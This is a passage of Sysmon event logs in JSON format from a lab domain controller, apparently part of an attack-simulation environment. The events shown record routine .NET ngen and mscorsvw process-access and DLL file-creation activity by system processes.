06:01:01.528","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-00105D681300}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8249,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.622\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-0010256C1300}\r\nTargetProcessId: 2188\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.622","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-0010256C1300}","TargetProcessId":"2188","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8250,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.622\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-0010256C1300}\r\nTargetProcessId: 2188\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.622","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-0010256C1300}","TargetProcessId":"2188","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8251,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-0010256C1300}\r\nTargetProcessId: 2188\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-0010256C1300}","TargetProcessId":"2188","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8252,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:02.419\r\nProcessGuid: {A837DB8D-051D-5F25-0000-0010256C1300}\r\nProcessId: 2188\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\88c-0\\System.Web.Services.dll\r\nCreationUtcTime: 2020-08-01 06:01:02.419","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:02.419","ProcessGuid":"{A837DB8D-051D-5F25-0000-0010256C1300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\88c-0\\System.Web.Services.dll","CreationUtcTime":"2020-08-01 06:01:02.419","EventReceivedTime":"2020-08-01 06:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8253,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.481\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-001088701300}\r\nTargetProcessId: 4100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.481","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-001088701300}","TargetProcessId":"4100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8254,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.481\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-001088701300}\r\nTargetProcessId: 4100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.481","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-001088701300}","TargetProcessId":"4100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8255,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051E-5F25-0000-001088701300}\r\nTargetProcessId: 4100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051E-5F25-0000-001088701300}","TargetProcessId":"4100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8256,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:02.528\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-001040AD1100}\r\nTargetProcessId: 1820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:02.528","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-001040AD1100}","TargetProcessId":"1820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d